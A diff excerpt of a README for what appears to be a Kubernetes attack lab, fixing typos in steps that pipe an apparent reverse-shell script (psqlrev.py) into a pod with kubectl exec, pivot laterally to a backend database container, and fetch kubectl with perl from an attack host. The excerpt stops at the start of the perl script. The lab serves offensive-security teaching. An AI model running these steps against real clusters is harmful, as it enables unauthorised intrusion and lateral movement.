kurtiepie/k8s_in_mem_lab/README.md

 ```bash
 cat psqlrev.py | kubectl -n frontend exec -it app-6f85bcbff4-m6zht -- python3
 ```
-You should now be on the backend server
+You should now be on the backend server!

 ----
 ## Step 6
 <a id="item-six"></a>
 Now that we have laterally pivited to backend server that does not have a read-only mount we are going to pull `kubectl` command with perl from or attack host or from the interweb.
-We are using perl as our interperter as python3 is not installed on postgres container.
+We are using perl as our interpreter as python3 is not installed on postgres container.
 With diverse workloads we need many different tools.

 ```perl
 #!/usr/bin/perl use strict;